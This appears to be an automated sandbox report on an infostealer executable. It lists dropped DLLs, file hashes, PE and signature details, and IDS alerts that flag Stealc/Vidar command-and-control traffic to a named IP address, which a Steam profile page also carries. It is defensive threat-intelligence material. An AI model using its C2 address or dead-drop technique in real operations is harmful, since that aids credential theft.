                                                                                                                                                                                                                          SHA-256:96A7CAE43D567EB9C3D849D887AEE58AC1D3917315984057854002642AC5CE24
                                                                                                                                                                                                                          SHA-512:DF4C51601958CCEE24D1CC4F3B4EF628FD8D88D9D5C7445B1313059B52AC11319484FF1794B5168DFBEBD3853876628351A8F6379B19B019B27F757E1EF3C449
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="556207" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):685392
                                                                                                                                                                                                                          Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                          • Filename: b157p9L0c1.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: PFlJLzFUqH.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: 46QSz6qyKC.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: X2lvDxMUmn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: vkkTIT6kcx.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):608080
                                                                                                                                                                                                                          Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                          • Filename: b157p9L0c1.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: PFlJLzFUqH.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: 46QSz6qyKC.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: X2lvDxMUmn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: vkkTIT6kcx.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):450024
                                                                                                                                                                                                                          Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):2046288
                                                                                                                                                                                                                          Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                          MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                          SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                          SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                          SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):257872
                                                                                                                                                                                                                          Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                          MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                          SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                          SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                          SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):80880
                                                                                                                                                                                                                          Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                          MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                          SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                          SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                          SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3035), with CRLF, LF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):34570
                                                                                                                                                                                                                          Entropy (8bit):5.400438178825524
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:D5lpqEg8QE2fJoAa1+6u8vAAnTBv++nIjBtPF5zfhkPXo8A5LTBv++nIjBtPF5xG:Nl8Eg8QE2fJoAa1+6u2nTBv++nIjBtPb
                                                                                                                                                                                                                          MD5:AF5DABF9003D72340354D0E146623018
                                                                                                                                                                                                                          SHA1:931FEA5ECEDFAFAE124C5053AF6A0E36B31AEA60
                                                                                                                                                                                                                          SHA-256:9A208641F75EEB7A6DF34836EE00773D2041A66078EEA032FB39EA2BF323045E
                                                                                                                                                                                                                          SHA-512:6125DECD779127A5B8EEC29E5D56864CDBFC8DAC7255FBB8DDE498AE7ED9786704B5AC3CD575B74E9F8F43FA0F58F51F80CBF0FA89F89DCDD2E95704B5FDE535
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: g0b4c https://95.217.220.103|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.steamstatic.com/public/shared/css/motiva_sans.css?v=v7XTmVzbLV33&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.steamstatic.com/public/shared/css/buttons.css?v=-WV9f1LdxEjq&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.steamstatic.com/public/shared/css/shared_global.css?v=_CwtgIbuqQ1L&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.steamstatic.com/public/css/globalv2.css?v=dQy8Omh4p9PH&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.steam
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:RDI Acoustic Doppler Current Profiler (ADCP)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1048575
                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:L8aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaU:LU
                                                                                                                                                                                                                          MD5:451252DF36D199577E9C9CE4ABF19CD3
                                                                                                                                                                                                                          SHA1:2887A551208C286314D55C5C1F401BA8057F1A0E
                                                                                                                                                                                                                          SHA-256:2AB0F11CFEEED22056ED06F6506E7A32C7024711B0B98BFED9BAAE9A988408A8
                                                                                                                                                                                                                          SHA-512:894DDD1EC46B8377B876BCB421D791BB99793A8EAF628774E804607FEA34D9FC2E9974D224A0EC949073FA7C78F333C7924FC92E4C417DBC002584950FC4AF43
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1835008
                                                                                                                                                                                                                          Entropy (8bit):4.465464467818732
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:2IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSb0:7XD94+WlLZMM6YFHR+0
                                                                                                                                                                                                                          MD5:4C1EE5A1A840740F3966767238BE4A4D
                                                                                                                                                                                                                          SHA1:A4564220E6E70527D9C47F0FBB0E46F84DFE65E9
                                                                                                                                                                                                                          SHA-256:DB4F4631ABDA091F6F6611E1D975A31D3110EC6C339B7B5539B00E4F5FBBD6E2
                                                                                                                                                                                                                          SHA-512:37017F655F8EF1E266FE15505145508D07D6C1E467EB44B68BF6FD7D3B7994B88DE1690AEA3702EEB2376E001521E18B38F957C9970636DE67FA7DD6565ABBC7
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Entropy (8bit):7.643471572502925
                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                          File name:UMrFwHyjUi.exe
                                                                                                                                                                                                                          File size:631'936 bytes
                                                                                                                                                                                                                          MD5:0d90ef55d1b1cb43ccb8fd30bbeba1a4
                                                                                                                                                                                                                          SHA1:5230fea74e8c4dedda59cbcdd13a9bc7ad035ac0
                                                                                                                                                                                                                          SHA256:13cf27504612ba911a324205db08dfa22cc42f3cb7e2600a69b65091ac528940
                                                                                                                                                                                                                          SHA512:9ced2030fee2ffa87246949d64d01493d4afd90082d7a6a376e2ffb454cd4553c30deff65b5dcf84e803f6019b5efd711e0dfd6738de12da037b009209ad854d
                                                                                                                                                                                                                          SSDEEP:12288:NFgKK6/E6QB44hLSVGuZwpZhOre3fpkugJtCJcplr7v:NFgS/EVe4hL0GuZwpZ6e3CXmGr7v
                                                                                                                                                                                                                          TLSH:5DD4F12135C0C072D6A3293609E4EBB56E7EF9300EA55E9F73980B7E4F703819735A5A
                                                                                                                                                                                                                          Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                          Entrypoint:0x409922
                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                          Digitally signed:true
                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                          Time Stamp:0x6716601E [Mon Oct 21 14:07:26 2024 UTC]
                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                          OS Version Major:6
                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                          File Version Major:6
                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                          Subsystem Version Major:6
                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                          Import Hash:31770ac6e89309fe8c99522fb04f055c
                                                                                                                                                                                                                          Signature Valid:false
                                                                                                                                                                                                                          Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                          Error Number:-2146869232
                                                                                                                                                                                                                          Not Before, Not After
                                                                                                                                                                                                                          • 31/08/2023 01:00:00 31/08/2026 00:59:59
                                                                                                                                                                                                                          Subject Chain
                                                                                                                                                                                                                          • CN=Privacy Technologies OU, O=Privacy Technologies OU, S=Harjumaa, C=EE
                                                                                                                                                                                                                          Version:3
                                                                                                                                                                                                                          Thumbprint MD5:AD1BCBF19AE2F91BB114D33B85359E56
                                                                                                                                                                                                                          Thumbprint SHA-1:141D90A1BA8F61863FBEDDF7DD1D66C1D1E0B128
                                                                                                                                                                                                                          Thumbprint SHA-256:A08EA2A7A257AD690B988446951E9DEF2986A2F3F546B6F0902805330F3B6B48
                                                                                                                                                                                                                          Serial:00D0461B529F67189D43744E9CEFE172AE
                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                          call 00007F1394BF7AD0h
                                                                                                                                                                                                                          jmp 00007F1394BF6F5Fh
                                                                                                                                                                                                                          mov ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                          mov dword ptr fs:[00000000h], ecx
                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                          pop edi
                                                                                                                                                                                                                          pop edi
                                                                                                                                                                                                                          pop esi
                                                                                                                                                                                                                          pop ebx
                                                                                                                                                                                                                          mov esp, ebp
                                                                                                                                                                                                                          pop ebp
                                                                                                                                                                                                                          push ecx
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x30bc0 | 0x28 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x95000 | 0x1e0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x97600 | 0x2e80 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x96000 | 0x2100 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x2e088 | 0x1c | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x2e0c0 | 0x18 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2dfc8 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x26000 | 0x158 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x247c5 | 0x24800 | d0b4a90124201411609de42d90a2266a | False | 0.5836298694349316 | data | 6.667699615091458 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x26000 | 0xb3c6 | 0xb400 | 391c781551f40065c919167d8be519db | False | 0.4264105902777778 | data | 4.902370268867813 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x32000 | 0x62ec4 | 0x62000 | 054079ff07efffb4d844b91676280b23 | False | 0.986564791932398 | data | 7.991236685552648 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x95000 | 0x1e0 | 0x200 | 0c003aad746538481e68cecd32d2c290 | False | 0.52734375 | data | 4.7083919432940915 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x96000 | 0x2100 | 0x2200 | 7e1c12fab7b5c499d4db33afc7ca1ffb | False | 0.7344898897058824 | data | 6.455290745494562 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| .bsp | 0x99000 | 0x3000 | 0x3000 | fa57fe0b9277ec77906afa81ea6dba8a | False | 0.019368489583333332 | OpenPGP Secret Key | 0.17578433934696627 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_MANIFEST | 0x95060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727 |

| DLL | Import |
|---|---|
| KERNEL32.dll | GlobalFindAtomA, RaiseException, GetCurrentThreadId, IsProcessorFeaturePresent, GetLastError, FreeLibraryWhenCallbackReturns, CreateThreadpoolWork, SubmitThreadpoolWork, CloseThreadpoolWork, GetModuleHandleExW, WakeAllConditionVariable, SleepConditionVariableSRW, InitOnceComplete, InitOnceBeginInitialize, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, TryAcquireSRWLockExclusive, WideCharToMultiByte, CloseHandle, QueryPerformanceCounter, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringEx, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, GetStringTypeW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsDebuggerPresent, GetStartupInfoW, GetCurrentProcessId, InitializeSListHead, CreateFileW, RtlUnwind, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleFileNameW, GetStdHandle, WriteFile, HeapAlloc, HeapFree, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, SetStdHandle, HeapSize, WriteConsoleW |

| Language of compilation system | Country where language is spoken |
|---|---|
| English | United States |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-10-23T17:05:26.076725+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49745 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:05:28.135906+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49747 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:05:29.688673+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49748 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:05:31.232344+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49749 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:05:31.883540+0200 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 95.217.220.103 | 443 | 192.168.2.4 | 49749 | TCP |
| 2024-10-23T17:05:32.791542+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49750 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:05:33.452105+0200 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST | 1 | 192.168.2.4 | 49750 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:05:33.452370+0200 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 95.217.220.103 | 443 | 192.168.2.4 | 49750 | TCP |
| 2024-10-23T17:05:34.407637+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49751 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:05:35.663703+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49752 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:05:41.857068+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49753 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:05:56.315756+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49756 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:05:58.360770+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49762 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:00.539870+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49772 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:02.343684+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49782 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:06.824500+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49808 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:11.079987+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49833 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:14.862988+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49857 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:18.020599+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49874 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:20.034709+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49886 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:27.037332+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49922 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:28.315052+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49930 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:29.881096+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49941 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:31.473792+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49950 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:33.570468+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49963 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:36.063596+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49976 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:37.609359+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49987 | 95.217.220.103 | 443 | TCP |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.205984116 CEST49743443192.168.2.492.122.104.90
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.209122896 CEST49743443192.168.2.492.122.104.90
